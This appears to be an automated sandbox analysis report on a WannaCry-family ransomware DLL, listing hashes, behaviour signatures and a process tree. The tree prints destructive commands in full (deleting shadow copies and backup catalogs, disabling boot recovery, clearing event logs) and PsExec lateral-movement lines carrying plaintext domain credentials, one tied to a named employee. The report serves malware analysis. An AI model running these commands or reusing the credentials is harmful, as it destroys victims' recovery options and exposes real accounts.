Overview
overview
10Static
static
10WannaCry/H...c1.dll
windows7_x64
1WannaCry/H...c1.dll
windows10_x64
1WannaCry/H...81.dll
windows7_x64
10WannaCry/H...81.dll
windows10_x64
10WannaCry/T...7f.dll
windows7_x64
10WannaCry/T...7f.dll
windows10_x64
10WannaCry/T...71.dll
windows7_x64
10WannaCry/T...71.dll
windows10_x64
10WannaCry/T...02.dll
windows7_x64
10WannaCry/T...02.dll
windows10_x64
10WannaCry/T...2f.dll
windows7_x64
10WannaCry/T...2f.dll
windows10_x64
10WannaCry/T...a6.dll
windows7_x64
10WannaCry/T...a6.dll
windows10_x64
10WannaCry/T...3f.dll
windows7_x64
10WannaCry/T...3f.dll
windows10_x64
10WannaCry/T...66.dll
windows7_x64
10WannaCry/T...66.dll
windows10_x64
10WannaCry/T...ba.dll
windows7_x64
10WannaCry/T...ba.dll
windows10_x64
10WannaCry/T...37.dll
windows7_x64
WannaCry/T...37.dll
windows10_x64
10WannaCry/T...10.dll
windows7_x64
10WannaCry/T...10.dll
windows10_x64
10WannaCry/T...f2.dll
windows7_x64
10WannaCry/T...f2.dll
windows10_x64
10WannaCry/T...af.dll
windows7_x64
10WannaCry/T...af.dll
windows10_x64
10WannaCry/T...40.dll
windows7_x64
10WannaCry/T...40.dll
windows10_x64
10WannaCry/T...81.dll
windows7_x64
10WannaCry/T...81.dll
windows10_x64
10Analysis
-
max time kernel
170s -
max time network
205s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
26-12-2020 20:16
Static task
static1
Behavioral task
behavioral1
Sample
WannaCry/HEUR.Trojan-Downloader.Win32.Generic.02c5f1515bf42798728fac17bfe1e4c1.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
WannaCry/HEUR.Trojan-Downloader.Win32.Generic.02c5f1515bf42798728fac17bfe1e4c1.dll
Resource
win10v20201028
Behavioral task
behavioral3
Sample
WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll
Resource
win7v20201028
Behavioral task
behavioral4
Sample
WannaCry/HEUR.Trojan.Win32.Generic.fc4bb3140f35cc8abd681b63096e7b81.dll
Resource
win10v20201028
Behavioral task
behavioral5
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.01bdc6fb077098f4a3b60f4b0e479a7f.dll
Resource
win7v20201028
Behavioral task
behavioral6
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.01bdc6fb077098f4a3b60f4b0e479a7f.dll
Resource
win10v20201028
Behavioral task
behavioral7
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.033f9150e241e7accecb60d849481871.dll
Resource
win7v20201028
Behavioral task
behavioral8
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.033f9150e241e7accecb60d849481871.dll
Resource
win10v20201028
Behavioral task
behavioral9
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab2aeda90221832167e5127332dd702.dll
Resource
win7v20201028
Behavioral task
behavioral10
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab2aeda90221832167e5127332dd702.dll
Resource
win10v20201028
Behavioral task
behavioral11
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab9a60a55cb40fc338e8f4988feee2f.dll
Resource
win7v20201028
Behavioral task
behavioral12
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0ab9a60a55cb40fc338e8f4988feee2f.dll
Resource
win10v20201028
Behavioral task
behavioral13
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0d95f3f64e7782ec7acd3a1b76c276a6.dll
Resource
win7v20201028
Behavioral task
behavioral14
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.0d95f3f64e7782ec7acd3a1b76c276a6.dll
Resource
win10v20201028
Behavioral task
behavioral15
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Resource
win7v20201028
Behavioral task
behavioral16
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.106e21fb736cb4e7a18a1746ef18e03f.dll
Resource
win10v20201028
Behavioral task
behavioral17
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1147f2c00d4bfd70169fe034c5965066.dll
Resource
win7v20201028
Behavioral task
behavioral18
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1147f2c00d4bfd70169fe034c5965066.dll
Resource
win10v20201028
Behavioral task
behavioral19
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.12cb506898dac8a271c8b940a9a3dfba.dll
Resource
win7v20201028
Behavioral task
behavioral20
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.12cb506898dac8a271c8b940a9a3dfba.dll
Resource
win10v20201028
Behavioral task
behavioral21
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Resource
win7v20201028
Behavioral task
behavioral22
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
Resource
win10v20201028
Behavioral task
behavioral23
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1e8e8eb9b0c25208b5c83be09430c010.dll
Resource
win7v20201028
Behavioral task
behavioral24
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.1e8e8eb9b0c25208b5c83be09430c010.dll
Resource
win10v20201028
Behavioral task
behavioral25
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.29a9dd686f08aacddacc43a0c57215f2.dll
Resource
win7v20201028
Behavioral task
behavioral26
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.29a9dd686f08aacddacc43a0c57215f2.dll
Resource
win10v20201028
Behavioral task
behavioral27
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2a13081acf353142a3e792683520cfaf.dll
Resource
win7v20201028
Behavioral task
behavioral28
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2a13081acf353142a3e792683520cfaf.dll
Resource
win10v20201028
Behavioral task
behavioral29
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2e5a8ac5174219bcb08d7449e43b1440.dll
Resource
win7v20201028
Behavioral task
behavioral30
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2e5a8ac5174219bcb08d7449e43b1440.dll
Resource
win10v20201028
Behavioral task
behavioral31
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2f76b88b420003516f90062940ef7881.dll
Resource
win7v20201028
Behavioral task
behavioral32
Sample
WannaCry/Trojan-Ransom.Win32.Wanna.m.2f76b88b420003516f90062940ef7881.dll
Resource
win10v20201028
General
-
Target
WannaCry/Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll
-
Size
5.0MB
-
MD5
1d6958990c8c4f5b9b93efa692b84937
-
SHA1
58bc6052ee6a13dc4711ca73df029a694f6e7239
-
SHA256
716954bdf4ef6882a71c8f2aa3981190da7777b50a3988069bb68eed17c7ddc8
-
SHA512
cb1445e197763d3ae28e8b7186a5f57cd8f34cbcba7c627d7004eb6dddbca67526ae721aff62d26c21b3585c0caef698b236194c90619c970099a5eced8d2682
Malware Config
Signatures
-
Wannacry
WannaCry is a ransomware cryptoworm.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exe, bcdedit.exe
pid | process
3808 | bcdedit.exe
2052 | bcdedit.exe
-
Deletes backup catalog
Processes:
wbadmin.exe
pid | process
1764 | wbadmin.exe
-
Executes dropped EXE 21 IoCs
Processes:
mssecsvc.exe (×2), tasksche.exe, opgpz.exe, _osc.exe, _yjl.exe (×16)
pid | process
2424 | mssecsvc.exe
3164 | mssecsvc.exe
748 | tasksche.exe
3820 | opgpz.exe
2828 | _osc.exe
204 | _yjl.exe
1772 | _yjl.exe
2652 | _yjl.exe
248 | _yjl.exe
264 | _yjl.exe
272 | _yjl.exe
3688 | _yjl.exe
1104 | _yjl.exe
2736 | _yjl.exe
3260 | _yjl.exe
3744 | _yjl.exe
3512 | _yjl.exe
2984 | _yjl.exe
1684 | _yjl.exe
1728 | _yjl.exe
1568 | _yjl.exe
-
Drops file in System32 directory 7 IoCs
Processes:
mssecsvc.exe
description | ioc | process
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | mssecsvc.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\D2AYU1VM.cookie | mssecsvc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\D2AYU1VM.cookie | mssecsvc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | mssecsvc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | mssecsvc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | mssecsvc.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | mssecsvc.exe
-
Drops file in Windows directory 2 IoCs
Processes:
rundll32.exe, mssecsvc.exe
description | ioc | process
File created | C:\WINDOWS\mssecsvc.exe | rundll32.exe
File created | C:\WINDOWS\tasksche.exe | mssecsvc.exe
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exe
description | ioc | process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName | vds.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 | vds.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName | vds.exe
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exe
pid | process
2540 | vssadmin.exe
-
Modifies data under HKEY_USERS 42 IoCs
Processes:
_yjl.exemssecsvc.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exe_yjl.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mssecsvc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet 
Settings\ZoneMap\IntranetName = "1" mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mssecsvc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ mssecsvc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe Set value 
(int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec\EulaAccepted = "1" _yjl.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\PsExec _yjl.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
opgpz.exe
pid | process
3820 | opgpz.exe
3820 | opgpz.exe
3820 | opgpz.exe
3820 | opgpz.exe
3820 | opgpz.exe
3820 | opgpz.exe
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
Processes:
_ftf.exe, opgpz.exe, _osc.exe, vssvc.exe, wbengine.exe, wevtutil.exe, wevtutil.exe
description | pid | process
Token: SeAssignPrimaryTokenPrivilege | 504 | _ftf.exe
Token: SeIncreaseQuotaPrivilege | 504 | _ftf.exe
Token: SeSecurityPrivilege | 504 | _ftf.exe
Token: SeTakeOwnershipPrivilege | 504 | _ftf.exe
Token: SeLoadDriverPrivilege | 504 | _ftf.exe
Token: SeSystemtimePrivilege | 504 | _ftf.exe
Token: SeBackupPrivilege | 504 | _ftf.exe
Token: SeRestorePrivilege | 504 | _ftf.exe
Token: SeShutdownPrivilege | 504 | _ftf.exe
Token: SeSystemEnvironmentPrivilege | 504 | _ftf.exe
Token: SeUndockPrivilege | 504 | _ftf.exe
Token: SeManageVolumePrivilege | 504 | _ftf.exe
Token: SeDebugPrivilege | 3820 | opgpz.exe
Token: SeShutdownPrivilege | 2828 | _osc.exe
Token: SeBackupPrivilege | 1108 | vssvc.exe
Token: SeRestorePrivilege | 1108 | vssvc.exe
Token: SeAuditPrivilege | 1108 | vssvc.exe
Token: SeBackupPrivilege | 2556 | wbengine.exe
Token: SeRestorePrivilege | 2556 | wbengine.exe
Token: SeSecurityPrivilege | 2556 | wbengine.exe
Token: SeSecurityPrivilege | 3824 | wevtutil.exe
Token: SeBackupPrivilege | 3824 | wevtutil.exe
Token: SeSecurityPrivilege | 2436 | wevtutil.exe
Token: SeBackupPrivilege | 2436 | wevtutil.exe
-
Suspicious use of WriteProcessMemory 84 IoCs
Processes:
rundll32.exerundll32.exePSEXESVC.exe_ftf.exe_osc.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 368 wrote to memory of 1468 368 rundll32.exe rundll32.exe PID 368 wrote to memory of 1468 368 rundll32.exe rundll32.exe PID 368 wrote to memory of 1468 368 rundll32.exe rundll32.exe PID 1468 wrote to memory of 2424 1468 rundll32.exe mssecsvc.exe PID 1468 wrote to memory of 2424 1468 rundll32.exe mssecsvc.exe PID 1468 wrote to memory of 2424 1468 rundll32.exe mssecsvc.exe PID 4056 wrote to memory of 504 4056 PSEXESVC.exe _ftf.exe PID 4056 wrote to memory of 504 4056 PSEXESVC.exe _ftf.exe PID 4056 wrote to memory of 504 4056 PSEXESVC.exe _ftf.exe PID 504 wrote to memory of 3820 504 _ftf.exe opgpz.exe PID 504 wrote to memory of 3820 504 _ftf.exe opgpz.exe PID 504 wrote to memory of 2828 504 _ftf.exe _osc.exe PID 504 wrote to memory of 2828 504 _ftf.exe _osc.exe PID 504 wrote to memory of 2828 504 _ftf.exe _osc.exe PID 2828 wrote to memory of 2308 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 2308 2828 _osc.exe cmd.exe PID 2308 wrote to memory of 2540 2308 cmd.exe vssadmin.exe PID 2308 wrote to memory of 2540 2308 cmd.exe vssadmin.exe PID 2828 wrote to memory of 1684 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 1684 2828 _osc.exe cmd.exe PID 1684 wrote to memory of 1764 1684 cmd.exe wbadmin.exe PID 1684 wrote to memory of 1764 1684 cmd.exe wbadmin.exe PID 2828 wrote to memory of 912 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 912 2828 _osc.exe cmd.exe PID 912 wrote to memory of 3808 912 cmd.exe bcdedit.exe PID 912 wrote to memory of 3808 912 cmd.exe bcdedit.exe PID 912 wrote to memory of 2052 912 cmd.exe bcdedit.exe PID 912 wrote to memory of 2052 912 cmd.exe bcdedit.exe PID 2828 wrote to memory of 2736 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 2736 2828 _osc.exe cmd.exe PID 2736 wrote to memory of 3824 2736 cmd.exe wevtutil.exe PID 2736 wrote to memory of 3824 2736 cmd.exe wevtutil.exe PID 504 wrote to memory of 204 
504 _ftf.exe _yjl.exe PID 504 wrote to memory of 204 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 204 504 _ftf.exe _yjl.exe PID 2828 wrote to memory of 260 2828 _osc.exe cmd.exe PID 2828 wrote to memory of 260 2828 _osc.exe cmd.exe PID 260 wrote to memory of 2436 260 cmd.exe wevtutil.exe PID 260 wrote to memory of 2436 260 cmd.exe wevtutil.exe PID 504 wrote to memory of 1772 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1772 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1772 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2652 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2652 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2652 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 248 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 248 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 248 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 264 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 264 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 264 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 272 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 272 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 272 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 3688 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 3688 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 3688 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1104 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1104 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 1104 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2736 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2736 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 2736 504 _ftf.exe _yjl.exe PID 504 wrote to memory of 3260 504 _ftf.exe _yjl.exe
Processes
-
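C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll,#1
(process tree depth 1; the argument ends in ",#1" — the extra trailing digit in the extracted text was the depth marker)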
- Suspicious use of WriteProcessMemory
-
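C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\WannaCry\Trojan-Ransom.Win32.Wanna.m.1d6958990c8c4f5b9b93efa692b84937.dll,#1
(process tree depth 2; the argument ends in ",#1" — the extra trailing digit in the extracted text was the depth marker)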
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\WINDOWS\mssecsvc.exe
C:\WINDOWS\mssecsvc.exe
(process tree depth 3)
- Executes dropped EXE
- Drops file in Windows directory
-
C:\WINDOWS\tasksche.exe
C:\WINDOWS\tasksche.exe /i
(process tree depth 4)
- Executes dropped EXE
-
C:\WINDOWS\mssecsvc.exe
C:\WINDOWS\mssecsvc.exe -m security
(process tree depth 1)
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\PSEXESVC.exe
C:\Windows\PSEXESVC.exe
(process tree depth 1 — listed as a root entry, not as a child of the rundll32.exe chain above)
- Suspicious use of WriteProcessMemory
-
C:\Windows\_ftf.exe
"_ftf.exe"
(process tree depth 2)
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
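C:\Windows\TEMP\opgpz.exe
123 \\.\pipe\2ECF9763-3A70-403C-A20C-21B1D7EF93D7
(process tree depth 3; "123" and the named-pipe path are the command-line arguments as shown in the report)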
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_osc.exe
"C:\Windows\TEMP\_osc.exe"
(process tree depth 3)
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
(process tree depth 4)
- Suspicious use of WriteProcessMemory
-
\??\c:\Windows\system32\vssadmin.exe
c:\Windows\system32\vssadmin.exe delete shadows /all /quiet
(process tree depth 5)
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wbadmin.exe delete catalog -quiet
(process tree depth 4)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wbadmin.exe
wbadmin.exe delete catalog -quiet
(process tree depth 5)
- Deletes backup catalog
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
(process tree depth 4)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
(process tree depth 5)
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exe
bcdedit /set {default} recoveryenabled no
(process tree depth 5)
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl System
(process tree depth 4)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl System
(process tree depth 5)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe cl Security
(process tree depth 4)
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl Security
(process tree depth 5)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "ww930\deb00999" -p "1qaz2wsx#EDC" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\w99a1mf0" -p "SUNTEMINdec2017" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "RUVOZ990FILSRV\MICROSOFT$DPM$Acct" -p "1qay2wsx_!NSN2" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "WW930\a593309" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "emea\elena.samokhvalova" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "MicrosoftOffice16_Data:SSPI:elena.samokhvalova@atos.net\(null)" -p "Provoka426446" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "10.95.47.55\WW930\reportadmin" -p "report2Admin05!" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\_yjl.exeC:\Windows\TEMP\_yjl.exe \\255.255.255.255 -u "TEQUILABOOMBOOM\janettedoe" -p "jane" -accepteula -d -s -c -f "C:\Windows\TEMP\_dus.exe"3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
